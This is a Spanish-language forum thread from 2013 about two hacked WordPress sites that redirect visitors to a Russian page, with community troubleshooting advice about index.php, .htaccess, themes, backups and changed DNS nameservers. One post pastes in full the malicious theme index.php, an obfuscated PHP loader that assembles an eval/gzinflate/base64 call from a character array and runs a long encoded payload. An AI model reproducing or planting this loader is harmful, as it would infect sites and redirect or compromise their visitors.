Problemas con virus en sitios web de WordPress

[juanmanuel]

Hola gente !!! tengo 2 virus en 2 sitios WP:

Enlace eliminado
Enlace eliminado

Cuando entras a la pagina te redirecciona hacia una web rusa ...

Alguien me puede decir como solucionarlo ???

------------------------------------------------------------------------
Banahosting despues de 4 horas:

esto no es un virus en nuestro server sino codigo inyectado en uno de sus sitios y obvio le propague en los demas sitios ya que es un copartido y todo son carpetas.
Saludos

 

[die beste]

entra al hosting, edita los archivos y borra el script que te redirecciona, debe estar en algun lugar del index

---------- Post agregado el 20-ago-2013 hora: 11:06 ----------

no creo que sea ningun virus, simplemente pusiste algun theme que venia con sorpresa, entra al hosting y borra las carpetas de themes menos la default de wp, debe ser 13 o 12
creo que eso sera mas facil de hacer

 

[juanmanuel]

entra al hosting, edita los archivos y borra el script que te redirecciona, debe estar en algun lugar del index

renombre la carpeta plugins y no pasa nada ..

como decis q haga ?

 

[VRed]

Revisa tu archivo .htaccess

 

[faustorm]

Te habrán cambiado el index.php, edítalo o sube el tuyo.

MP si necesitas que te eche un cable.

 

[die beste]

vas a content y borras las carpetas que hay dentro de themes, que sean themes que hayas subido, solo dejas la carpeta del theme por defecto, eso deberia eliminar los archivos con el script de rfedireccion, si no funciona eso hay que destripar algun otro archivo para ver donde esta el redir

 

[juanmanuel]

tengo en mi carpeta theme un index.php que contiene esto, lo elimino pero no alcanza

<?php
$md5 = "a5c59f14098c768e86ed30cb24fc194b";
$ab = array('v',"e",'r','l',")",'$','c',"s",'a',"z",'b','t','4','6',"_","o",'g',"(","d",'i',"f",'n',";");
$bb9 = create_function('$'.'v',$ab[1].$ab[0].$ab[8].$ab[3].$ab[17].$ab[16].$ab[9].$ab[19].$ab[21].$ab[20].$ab[3].$ab[8].$ab[11].$ab[1].$ab[17].$ab[10].$ab[8].$ab[7].$ab[1].$ab[13].$ab[12].$ab[14].$ab[18].$ab[1].$ab[6].$ab[15].$ab[18].$ab[1].$ab[17].$ab[5].$ab[0].$ab[4].$ab[4].$ab[4].$ab[22]);
$bb9('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');
?>
<?php
// Silence is golden.
?>

 

[faustorm]

¿Tienes BackUp?

---------- Post agregado el 20-ago-2013 hora: 11:14 ----------

Te digo lo de la BackUp porque yo te recomiendo que te cepilles todo el directorio de wordpress y metas la BackUp

 

[sanata]

en primer lugar elimina ese index.php y sube uno limpio.
En segundo lugar y por precaución cambia la contraseña del hosting (por precaución).
Suele suceder que limpias y luego vuelven a reinfectarte.
En tercer lugar revisa los archivos php y js que tengan fecha de edición reciente. Es allí donde suelen insertar estos códigos maliciosos.

 

[juanmanuel]

¿Tienes BackUp?

---------- Post agregado el 20-ago-2013 hora: 11:14 ----------

Te digo lo de la BackUp porque yo te recomiendo que te cepilles todo el directorio de wordpress y metas la BackUp

no tenog buck up

 

[faustorm]

¡Haz ya mismo una de la base de datos a través del mysql!

Luego, como dice sanata, sube un index limpio y cambias las claves.

Es posible que tengas algún trollano en el PC que envíe tus contraseñas al hacker de turno, échale un ojo.

En cuanto lo tengas limpio instalate algún plugin de backups como "WP Backup to Dropbox" es el que uso yo.

 

[juanmanuel]

¡Haz ya mismo una de la base de datos a través del mysql!

Luego, como dice sanata, sube un index limpio y cambias las claves.

Es posible que tengas algún trollano en el PC que envíe tus contraseñas al hacker de turno, échale un ojo.

En cuanto lo tengas limpio instalate algún plugin de backups como "WP Backup to Dropbox" es el que uso yo.

Acabo de borrar TODO ... no hay nada en Enlace eliminado ... y el virus sigue

 

[Zheive]

A mi una vez me entró un código malicioso y lo solucioné bajando todos los archivos del servidor y pasándole un antivirus (el Avast).

 

[sanata]

Acabo de borrar TODO ... no hay nada en Enlace eliminado ... y el virus sigue

si es como tu dices, quizás sea mejor que le pidas asistencia urgente a los de Banahosting. He visto que esas son las DNS del dominio.

 

[die beste]

hay mas victimas en ese hosting, pero debe ser mas facil echarle la culpa al usuario que solucionarlo ellos, en fin
en mi epoca directamente se baneaba al que subia scripts al hosting, porque despues pasa esto, que se infectan todos los que comparten servidor

 

[Jeordie]

revisa todos los archivos del theme buscando codigos ofuscados como ese y lo mismo con los plugins

 

[sanata]

revisa todos los archivos del theme buscando codigos ofuscados como ese y lo mismo con los plugins

Acaba de decir que borró todo...

 

[dani002]

nserver: ns1.dgrad-host.com.
nserver: ns2.dgrad-host.com.

son las de tu hosting ?

 

[Steeep]

Lo mejor es que hagas un backup ya, & que si puedes actualices tus plugins.

 

[juanmanuel]

nserver: ns1.dgrad-host.com.
nserver: ns2.dgrad-host.com.

son las de tu hosting ?

No son las de mi hosting ..................

WTF !!??

como viste eso ? Yo veo otras